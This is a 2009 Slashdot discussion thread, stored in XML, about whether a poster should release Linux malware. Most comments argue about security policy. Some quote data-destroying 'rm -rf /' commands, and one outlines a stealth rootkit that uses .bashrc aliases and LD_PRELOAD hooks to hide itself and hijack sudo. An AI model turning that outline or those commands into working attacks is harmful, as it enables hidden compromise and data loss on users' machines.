<sentencetext>This doesn't prove anything except that Windows losers desperately want some shadenfruedeI've gotten pwned by legit updates more on Linux than on Windows.That's bad.
Microsoft has a poor track record.
Beating it is awful, though understandable.
(You can't test stuff on every piece of hardware in existence)I haven't had a virus or trojan in about 7 years, so I think I'm finally knowledgeable enough to run Windows safely.
This thing however would pwn me, because I don't have as much linux knowledge.
;)He should definitely release it.
Linux is spreading - if you let admins get a false sense of security, they'll get pwned, and Linux will gain the same rep as Windows.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283196</id>
	<title>Re:I think you've already decided...</title>
	<author>jedidiah</author>
	<datestamp>1259682900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>...in which case you've got a single cratered machine.</p><p>Malware needs an environment that will allow it to grow and propagate. THAT is the most important part of the equation.</p><p>Any idiot user can blindly run "rm -rf<nobr> <wbr></nobr>/*". They can even do it on MacOS if you give them good enough instructions.</p><p>Individual users blowing their toes off aren't the real danger.</p></htmltext>
<tokenext>...in which case you 've got a single cratered machine.Malware needs an environment that will allow it to grow and propagate .
THAT is the most important part of the equation.Any idiot user can blindly run " rm -rf / * " .
They can even do it on MacOS if you give them good enough instructions.Individual users blowing their toes off are n't the real danger .</tokentext>
<sentencetext>...in which case you've got a single cratered machine.Malware needs an environment that will allow it to grow and propagate.
THAT is the most important part of the equation.Any idiot user can blindly run "rm -rf /*".
They can even do it on MacOS if you give them good enough instructions.Individual users blowing their toes off aren't the real danger.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280404</id>
	<title>Re:Dear Slashdot</title>
	<author>Tim C</author>
	<datestamp>1259658060000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Actually, some people do walk around indiscriminately - those bad neighbourhoods aren't bad because they're empty, are they? Similarly, there are plenty of us who don't interact with the Internet indiscriminately.</p></htmltext>
<tokenext>Actually , some people do walk around indiscriminately - those bad neighbourhoods are n't bad because they 're empty , are they ?
Similarly , there are plenty of us who do n't interact with the Internet indiscriminately .</tokentext>
<sentencetext>Actually, some people do walk around indiscriminately - those bad neighbourhoods aren't bad because they're empty, are they?
Similarly, there are plenty of us who don't interact with the Internet indiscriminately.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164</id>
	<title>Arrogance... Nothing New.</title>
	<author>coolmoose25</author>
	<datestamp>1259600820000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>I work with AS400 and iSeries machines (and I accept your collective condolences).  When I first got trained on them, the teachers told us that OS400 has never been hacked.  Not having any real data to confront them, I just let it pass.  When we covered the section about user ids and passwords, I found out that 400's force you to disable a user id and password after a certain, finite number of logon attempts.  This was by design.  All user ids, including system administrator ids had to have some number (I forget how high you can set it) of illegal attempts before the id is locked out. (Usually this is set to 3) They explained, smugly, that this was to keep out intruders.<br> <br>
We further learned that user id's could not be set to more than 10 characters.  So I raised my hand and asked what happened if all the user accounts got disabled.  They said that IBM would have to back door their way in to unlock a system administrator account, and from that account, others could be reset.  (This would be BAD and time consuming, so it was good practice to keep a few SYSADMIN accounts around just in case)  I asked if they had ever heard of a denial of service attack.  Of course they said.  So I asked the obvious question, "What if someone wrote a script to log on to every 10 digit user account 3 times with a blank password?"  The reply was "Why would anyone do THAT?"<br> <br>
I pointed out that while I couldn't "hack" their system by their definitions, I could sure as heck turn it into a boat anchor, and do it remotely if it was hooked to the Internet...  "Yes, but you can't HACK it was the reply..."</htmltext>
<tokenext>I work with AS400 and iSeries machines ( and I accept your collective condolences ) .
When I first got trained on them , the teachers told us that OS400 has never been hacked .
Not having any real data to confront them , I just let it pass .
When we covered the section about user ids and passwords , I found out that 400 's force you to disable a user id and password after a certain , finite number of logon attempts .
This was by design .
All user ids , including system administrator ids had to have some number ( I forget how high you can set it ) of illegal attempts before the id is locked out .
( Usually this is set to 3 ) They explained , smugly , that this was to keep out intruders .
We further learned that user id 's could not be set to more than 10 characters .
So I raised my hand and asked what happened if all the user accounts got disabled .
They said that IBM would have to back door their way in to unlock a system administrator account , and from that account , others could be reset .
( This would be BAD and time consuming , so it was good practice to keep a few SYSADMIN accounts around just in case ) I asked if they had ever heard of a denial of service attack .
Of course they said .
So I asked the obvious question , " What if someone wrote a script to log on to every 10 digit user account 3 times with a blank password ?
" The reply was " Why would anyone do THAT ?
" I pointed out that while I could n't " hack " their system by their definitions , I could sure as heck turn it into a boat anchor , and do it remotely if it was hooked to the Internet... " Yes , but you ca n't HACK it was the reply... "</tokentext>
<sentencetext>I work with AS400 and iSeries machines (and I accept your collective condolences).
When I first got trained on them, the teachers told us that OS400 has never been hacked.
Not having any real data to confront them, I just let it pass.
When we covered the section about user ids and passwords, I found out that 400's force you to disable a user id and password after a certain, finite number of logon attempts.
This was by design.
All user ids, including system administrator ids had to have some number (I forget how high you can set it) of illegal attempts before the id is locked out.
(Usually this is set to 3) They explained, smugly, that this was to keep out intruders.
We further learned that user id's could not be set to more than 10 characters.
So I raised my hand and asked what happened if all the user accounts got disabled.
They said that IBM would have to back door their way in to unlock a system administrator account, and from that account, others could be reset.
(This would be BAD and time consuming, so it was good practice to keep a few SYSADMIN accounts around just in case)  I asked if they had ever heard of a denial of service attack.
Of course they said.
So I asked the obvious question, "What if someone wrote a script to log on to every 10 digit user account 3 times with a blank password?
"  The reply was "Why would anyone do THAT?
" 
I pointed out that while I couldn't "hack" their system by their definitions, I could sure as heck turn it into a boat anchor, and do it remotely if it was hooked to the Internet...  "Yes, but you can't HACK it was the reply..."</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280072</id>
	<title>But</title>
	<author>Anonymous</author>
	<datestamp>1259610780000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I am not a lawyer, but as I understand the legal definitions, malware/spyware/virus/trojans do not have to be harmful to be illegal.  Anything installed without the user's knowledge and consent is illegal.</p></htmltext>
<tokenext>I am not a lawyer , but as I understand the legal definitions , malware/spyware/virus/trojans do not have to be harmful to be illegal .
Anything installed without the user 's knowledge and consent is illegal .</tokentext>
<sentencetext>I am not a lawyer, but as I understand the legal definitions, malware/spyware/virus/trojans do not have to be harmful to be illegal.
Anything installed without the user's knowledge and consent is illegal.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30291980</id>
	<title>OP is BSing us</title>
	<author>awpoopy</author>
	<datestamp>1259676720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Release it. It's not malware in the way that windows malware gets spread. My Linux and FreeBSD boxes ARE more secure than your windows boxes.<br>
If it can't be installed without user interaction, it's useless here on<nobr> <wbr></nobr>/.<br>
Me thinks it's a hoax and flamebait.</htmltext>
<tokenext>Release it .
It 's not malware in the way that windows malware gets spread .
My Linux and FreeBSD boxes ARE more secure than your windows boxes .
If it ca n't be installed without user interaction , it 's useless here on / .
Me thinks it 's a hoax and flamebait .</tokentext>
<sentencetext>Release it.
It's not malware in the way that windows malware gets spread.
My Linux and FreeBSD boxes ARE more secure than your windows boxes.
If it can't be installed without user interaction, it's useless here on /.
Me thinks it's a hoax and flamebait.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30287154</id>
	<title>Help, do not destroy</title>
	<author>Art3x</author>
	<datestamp>1259698560000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>A father used to rationalize why he was so mean to his son by saying, "I'm getting him ready for the world, because it is mean." By that rationale, the best thing would be to simply dump the child out on the streets.</p><p>If you see flawed code, submit a patch.</p><p>If you see flawed usage, educate users (documentation, blog article, forum posts).</p></htmltext>
<tokenext>A father used to rationalize why he was so mean to his son by saying , " I 'm getting him ready for the world , because it is mean .
" By that rationale , the best thing would be to simply dump the child out on the streets.If you see flawed code , submit a patch.If you see flawed usage , educate users ( documentation , blog article , forum posts ) .</tokentext>
<sentencetext>A father used to rationalize why he was so mean to his son by saying, "I'm getting him ready for the world, because it is mean.
" By that rationale, the best thing would be to simply dump the child out on the streets.If you see flawed code, submit a patch.If you see flawed usage, educate users (documentation, blog article, forum posts).</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281474</id>
	<title>Re:Linux Malware</title>
	<author>KeNickety</author>
	<datestamp>1259669700000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Surely you mean sudo rm -rf --no-preserve-root /</htmltext>
<tokenext>Surely you mean sudo rm -rf --no-preserve-root /</tokentext>
<sentencetext>Surely you mean sudo rm -rf --no-preserve-root /</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279508</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285250</id>
	<title>Re:Tricking people into doing stupid things.</title>
	<author>Anonymous</author>
	<datestamp>1259691900000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Why would people install cd-drive-cupholders? Linux already has an 'eject' command<nobr> <wbr></nobr>:p</p></htmltext>
<tokenext>Why would people install cd-drive-cupholders ?
Linux already has an 'eject ' command : p</tokentext>
<sentencetext>Why would people install cd-drive-cupholders?
Linux already has an 'eject' command :p</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279100</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280876</id>
	<title>Re:Arrogance... Nothing New.</title>
	<author>IntlHarvester</author>
	<datestamp>1259663280000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I have personal knowledge of ASS/400 systems which have been infiltrated from ye olde dot com days, so phooey. Just like anything else, you can have the greatest security system in the world, but if you put some dumbshit FTP server on top, people will find their way in.</p><p>I think if you actually talked to anyone who works with these, they would tell you to firewall them way way off. Not that Linux/Apache is perfect, but lots of people generally understand it, which is more than you can say for IBM PTF6893QT.5 or whatever their webserver software is called nowdays.</p></htmltext>
<tokenext>I have personal knowledge of ASS/400 systems which have been infiltrated from ye olde dot com days , so phooey .
Just like anything else , you can have the greatest security system in the world , but if you put some dumbshit FTP server on top , people will find their way in.I think if you actually talked to anyone who works with these , they would tell you to firewall them way way off .
Not that Linux/Apache is perfect , but lots of people generally understand it , which is more than you can say for IBM PTF6893QT.5 or whatever their webserver software is called nowdays .</tokentext>
<sentencetext>I have personal knowledge of ASS/400 systems which have been infiltrated from ye olde dot com days, so phooey.
Just like anything else, you can have the greatest security system in the world, but if you put some dumbshit FTP server on top, people will find their way in.I think if you actually talked to anyone who works with these, they would tell you to firewall them way way off.
Not that Linux/Apache is perfect, but lots of people generally understand it, which is more than you can say for IBM PTF6893QT.5 or whatever their webserver software is called nowdays.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281904</id>
	<title>knowledge is impossible to contain</title>
	<author>thinkloop</author>
	<datestamp>1259674560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I'm not pro-war, but I sure as hell will be happy that war allowed us to developed the nuclear bomb when aliens invade. So I say release it - knowledge is impossible to contain - we are better off adapting to it early.</htmltext>
<tokenext>I 'm not pro-war , but I sure as hell will be happy that war allowed us to developed the nuclear bomb when aliens invade .
So I say release it - knowledge is impossible to contain - we are better off adapting to it early .</tokentext>
<sentencetext>I'm not pro-war, but I sure as hell will be happy that war allowed us to developed the nuclear bomb when aliens invade.
So I say release it - knowledge is impossible to contain - we are better off adapting to it early.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278834</id>
	<title>Absolutely evil</title>
	<author>ohmiccurmudgeon</author>
	<datestamp>1259597760000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p>We already know how to break into systems with buffer and heap overflows.  We know how to do SQL injection into not-so-smart applications.  If you work at it you can break into almost anything.</p><p>Absolutely no good purpose is served providing a toolkit that allows people to break into naively configured systems.  Much of what you describe is akin to leaving the keys in your Maserati with the doors unlocked and the engine running.  Please don't make things easier for joyriding teenagers.</p><p>If a site wants to know if they're secure, within the current limits of our knowledge, they can perform their own audits, and hire their own advisers to test their systems in a controlled fashion.</p><p>Applications, such as BOINC, have an unknown state of security review or audit.  I doubt they applied the coding guidelines of CERT, or any of the Common Criteria levels.  An administrator would only deploy such applications in the DMZ of their network.  To call a Linux system, or Windoze system, secure means you've evaluated the risk of both the operating system and the applications on that system and decided it is good enough for you.</p></htmltext>
<tokenext>We already know how to break into systems with buffer and heap overflows .
We know how to do SQL injection into not-so-smart applications .
If you work at it you can break into almost anything.Absolutely no good purpose is served providing a toolkit that allows people to break into naively configured systems .
Much of what you describe is akin to leaving the keys in your Maserati with the doors unlocked and the engine running .
Please do n't make things easier for joyriding teenagers.If a site wants to know if they 're secure , within the current limits of our knowledge , they can perform their own audits , and hire their own advisers to test their systems in a controlled fashion.Applications , such as BOINC , have an unknown state of security review or audit .
I doubt they applied the coding guidelines of CERT , or any of the Common Criteria levels .
An administrator would only deploy such applications in the DMZ of their network .
To call a Linux system , or Windoze system , secure means you 've evaluated the risk of both the operating system and the applications on that system and decided it is good enough for you .</tokentext>
<sentencetext>We already know how to break into systems with buffer and heap overflows.
We know how to do SQL injection into not-so-smart applications.
If you work at it you can break into almost anything.Absolutely no good purpose is served providing a toolkit that allows people to break into naively configured systems.
Much of what you describe is akin to leaving the keys in your Maserati with the doors unlocked and the engine running.
Please don't make things easier for joyriding teenagers.If a site wants to know if they're secure, within the current limits of our knowledge, they can perform their own audits, and hire their own advisers to test their systems in a controlled fashion.Applications, such as BOINC, have an unknown state of security review or audit.
I doubt they applied the coding guidelines of CERT, or any of the Common Criteria levels.
An administrator would only deploy such applications in the DMZ of their network.
To call a Linux system, or Windoze system, secure means you've evaluated the risk of both the operating system and the applications on that system and decided it is good enough for you.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284680</id>
	<title>seriously, dude...</title>
	<author>spidercoz</author>
	<datestamp>1259689440000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>if Linux starts getting as bad as Windows, I will personally hunt you down and beat you to death with Richard Stallman</htmltext>
<tokenext>if Linux starts getting as bad as Windows , I will personally hunt you down and beat you to death with Richard Stallman</tokentext>
<sentencetext>if Linux starts getting as bad as Windows, I will personally hunt you down and beat you to death with Richard Stallman</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278790</id>
	<title>no</title>
	<author>Anonymous</author>
	<datestamp>1259597460000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>no</htmltext>
<tokenext>no</tokentext>
<sentencetext>no</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280118</id>
	<title>Re:Malware and Worms in GNU/Linux and *BSD</title>
	<author>BerkeleyDude</author>
	<datestamp>1259697780000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the
default behavior is to <b>notify only</b>. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you
EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.</p></div><p>This will make it more difficult to trick the user, but not impossible. As long as the system menu is running with the user's privileges, it can be modified to launch a different program. And even if you find a way to prevent the user from messing with it - e.g., run it as a different user - the user won't be able to make any legitimate changes, either.</p><p>It's even easier for command-line tools: add a line to<nobr> <wbr></nobr>.bashrc that creates aliases or modifies $PATH so "sudo" and "su" point to malicious programs. How many users would actually check their $PATH or aliases before running sudo?</p><p>Finally, here's a way to create an almost undetectable malware. Add the line "LD\_PRELOAD=~/.malware.so" to<nobr> <wbr></nobr>.bashrc where ~/.malware.so does the following:<br>
- Removes the LD\_PRELOAD variable from the environment, so it's undetectable.<br>
- Modifies "exec..." functions so they add LD\_PRELOAD back (and also replace "su", "sudo", etc. with a different program).<br>
- Modifies "open" and "read" functions so the line in<nobr> <wbr></nobr>.bashrc is invisible to the user.<br>
- Modifies "opendir" and "readdir" to make ~/.malware.so invisible to the user.<br>
- etc.<br>
(This would work for any application - not just command-line ones.)</p></div>
	</htmltext>
<tokenext>Looks scary , right ?
Wrong. Because the solution is as simple as changing the default policy .
Make it so that the default behavior is to notify only .
On every system update the user should be told : " Go start the updater via the system menu .
By the way , if you EVER see an " updater " you did n't start yourself , you are being pwned .
" Make sure that the system menu is strictly read-only , and even the dimmest user will be safe.This will make it more difficult to trick the user , but not impossible .
As long as the system menu is running with the user 's privileges , it can be modified to launch a different program .
And even if you find a way to prevent the user from messing with it - e.g. , run it as a different user - the user wo n't be able to make any legitimate changes , either.It 's even easier for command-line tools : add a line to .bashrc that creates aliases or modifies $ PATH so " sudo " and " su " point to malicious programs .
How many users would actually check their $ PATH or aliases before running sudo ? Finally , here 's a way to create an almost undetectable malware .
Add the line " LD \ _PRELOAD = ~ /.malware.so " to .bashrc where ~ /.malware.so does the following : - Removes the LD \ _PRELOAD variable from the environment , so it 's undetectable .
- Modifies " exec... " functions so they add LD \ _PRELOAD back ( and also replace " su " , " sudo " , etc .
with a different program ) .
- Modifies " open " and " read " functions so the line in .bashrc is invisible to the user .
- Modifies " opendir " and " readdir " to make ~ /.malware.so invisible to the user .
- etc .
( This would work for any application - not just command-line ones .
)</tokentext>
<sentencetext>Looks scary, right?
Wrong. Because the solution is as simple as changing the default policy.
Make it so that the
default behavior is to notify only.
On every system update the user should be told: "Go start the updater via the system menu.
By the way, if you
EVER see an "updater" you didn't start yourself, you are being pwned.
" Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.This will make it more difficult to trick the user, but not impossible.
As long as the system menu is running with the user's privileges, it can be modified to launch a different program.
And even if you find a way to prevent the user from messing with it - e.g., run it as a different user - the user won't be able to make any legitimate changes, either.It's even easier for command-line tools: add a line to .bashrc that creates aliases or modifies $PATH so "sudo" and "su" point to malicious programs.
How many users would actually check their $PATH or aliases before running sudo?Finally, here's a way to create an almost undetectable malware.
Add the line "LD\_PRELOAD=~/.malware.so" to .bashrc where ~/.malware.so does the following:
- Removes the LD\_PRELOAD variable from the environment, so it's undetectable.
- Modifies "exec..." functions so they add LD\_PRELOAD back (and also replace "su", "sudo", etc.
with a different program).
- Modifies "open" and "read" functions so the line in .bashrc is invisible to the user.
- Modifies "opendir" and "readdir" to make ~/.malware.so invisible to the user.
- etc.
(This would work for any application - not just command-line ones.
)
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278890</id>
	<title>Re:Dear Slashdot</title>
	<author>Anonymous</author>
	<datestamp>1259598120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>this is actually a real problem.</p><p>random people have been getting punched in the face all over:</p><p>http://www.hulu.com/watch/1415/saturday-night-live-snl-digital-short-people-getting-punched-right-before-eating</p></htmltext>
<tokenext>this is actually a real problem.random people have been getting punched in the face all over : http : //www.hulu.com/watch/1415/saturday-night-live-snl-digital-short-people-getting-punched-right-before-eating</tokentext>
<sentencetext>this is actually a real problem.random people have been getting punched in the face all over:http://www.hulu.com/watch/1415/saturday-night-live-snl-digital-short-people-getting-punched-right-before-eating</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820</id>
	<title>Re:I think you've already decided...</title>
	<author>jedidiah</author>
	<datestamp>1259597640000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>OMG! The sky is falling! The sky is falling!</p><p>You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!</p><p>Nevermind Trojans. A buggy apps could destroy all of my data and it doesn't even need an author with a cheesy villan laugh.</p><p>This doesn't prove anything except that Windows losers desperately want some shadenfruede.</p></htmltext>
<tokenext>OMG !
The sky is falling !
The sky is falling ! You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY ! Nevermind Trojans .
A buggy apps could destroy all of my data and it does n't even need an author with a cheesy villan laugh.This does n't prove anything except that Windows losers desperately want some shadenfruede .</tokentext>
<sentencetext>OMG!
The sky is falling!
The sky is falling!You can get victimized by something that you HAVE TO CHOOSE TO RUN MANUALLY!Nevermind Trojans.
A buggy apps could destroy all of my data and it doesn't even need an author with a cheesy villan laugh.This doesn't prove anything except that Windows losers desperately want some shadenfruede.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279012</id>
	<title>Sounds good to me</title>
	<author>Anonymous</author>
	<datestamp>1259599140000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>"After a week of work, I finished a package of malware for Unix/Linux."<br>Really, this might be a fun thread. Just out of curiosity, did you use vi or emacs to code it? And if you actually plan to release the code, there is also the question of the license.</p></htmltext>
<tokenext>" After a week of work , I finished a package of malware for Unix/Linux .
" Really , this might be a fun thread .
Just out of curiosity , did you use vi or emacs to code it ?
And if you actually plan to release the code , there is also the question of the license .</tokentext>
<sentencetext>"After a week of work, I finished a package of malware for Unix/Linux.
"Really, this might be a fun thread.
Just out of curiosity, did you use vi or emacs to code it?
And if you actually plan to release the code, there is also the question of the license.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281664</id>
	<title>Ask Robert Morris</title>
	<author>funkman</author>
	<datestamp>1259671980000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>His worm had a little bug in it and see what happened to him<nobr> <wbr></nobr>:)</p></htmltext>
<tokenext>His worm had a little bug in it and see what happened to him : )</tokentext>
<sentencetext>His worm had a little bug in it and see what happened to him :)</sentencetext>
</comment>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_29</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279246
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280840
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_71</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281928
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_3</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279286
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_11</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30287906
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_59</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297282
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_35</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279550
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_66</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280734
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_49</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30287808
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_42</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278934
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279866
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280066
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_65</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278820
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281182
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_56</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289996
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289190
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289738
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280830
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279304
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280284
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278810
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_28</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278936
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_32</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278974
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281874
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_2</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285768
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_12_01_0025213_18</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278596
